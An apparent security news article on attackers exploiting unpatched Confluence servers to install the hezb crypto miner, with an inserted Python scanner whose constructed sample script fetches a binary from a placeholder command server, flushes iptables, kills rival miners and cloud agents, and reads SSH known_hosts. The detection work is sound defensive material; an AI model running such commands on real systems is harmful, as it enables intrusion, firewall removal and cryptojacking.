Hackers Targeting Unpatched Atlassian Confluence Servers to Deploy Crypto Miners (Security News, September 2022)
A now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.
In one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script on the victim's machine, which, in turn, fetched a second shell script.
The malicious code is designed to update the PATH variable to include additional paths such as "/tmp", download the cURL utility from a remote server, disable the iptables firewall, abuse the PwnKit flaw to gain root privileges, and ultimately deploy the hezb crypto miner.
Like other cryptojacking attacks, the shell script also terminates competing coin miners and disables cloud service provider agents from Alibaba and Tencent before carrying out lateral movement via SSH. The findings mirror similar exploitation attempts previously disclosed by Lacework, Microsoft, Sophos, and Akamai in June.
Lacework's analysis further shows that the command-and-control server used to retrieve the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named "Kik" that enables the malware to kill processes of interest.
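The behaviours listed above (PATH modified to include /tmp, cURL fetched from a remote host, iptables disabled, PwnKit used for privilege escalation, rival miners killed, Alibaba/Tencent agents stopped, SSH lateral movement) are each detectable in a dropped shell script. The following scanner is an added example, not code from the article or from any of the vendors it cites; the regexes, the miner names (xmrig, kinsing, minerd, kdevtmpfsi) and the cloud-agent process names (AliYunDun, aliyun.service, YunJing, barad_agent) are my assumptions, and the sample script is constructed and inert.

```python
import re

# One regex per behaviour the article attributes to the dropped script.
# Pattern details and the process names below are assumptions, not values
# quoted from the article.
INDICATORS = {
    "path_includes_tmp": re.compile(r"\bPATH=.*\/tmp\b"),
    "curl_fetched_from_remote": re.compile(r"\b(?:wget|curl)\b.*\bcurl\b"),
    "firewall_disabled": re.compile(r"\biptables\b.*(?:-F\b|--flush\b|-P\s+\w+\s+ACCEPT)"),
    "pwnkit_privesc": re.compile(r"pkexec|pwnkit", re.IGNORECASE),
    "competing_miners_killed": re.compile(
        r"\b(?:pkill|killall|kill)\b.*(?:xmrig|kinsing|minerd|kdevtmpfsi)", re.IGNORECASE),
    "cloud_agent_disabled": re.compile(
        r"AliYunDun|aliyun\.service|YunJing|barad_agent", re.IGNORECASE),
    "ssh_lateral_movement": re.compile(
        r"known_hosts|\bssh\b.*StrictHostKeyChecking", re.IGNORECASE),
}


def scan_script(script: str) -> dict[str, list[int]]:
    """Return {indicator_name: [line numbers]} for every indicator seen in a script."""
    hits: dict[str, list[int]] = {}
    for lineno, line in enumerate(script.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def is_cryptojacking_chain(script: str, min_indicators: int = 3) -> bool:
    """Flag a script when it combines several of the behaviours at once."""
    return len(scan_script(script)) >= min_indicators


# Constructed, non-functional sample mirroring the chain described above.
SAMPLE_SCRIPT = """\
export PATH=$PATH:/tmp
wget -O /tmp/curl http://C2-PLACEHOLDER/curl
iptables -F
chmod +x /tmp/pwnkit
pkill -f xmrig
pkill -f AliYunDun
cut -d' ' -f1 ~/.ssh/known_hosts
"""

if __name__ == "__main__":
    for name, lines in scan_script(SAMPLE_SCRIPT).items():
        print(f"{name}: lines {lines}")
    print("flagged:", is_cryptojacking_chain(SAMPLE_SCRIPT))
```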
"Attackers could take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself," Bharti said.
News URL
https://thehackernews.com/2022/09/hackers-targeting-unpatched-atlassian.html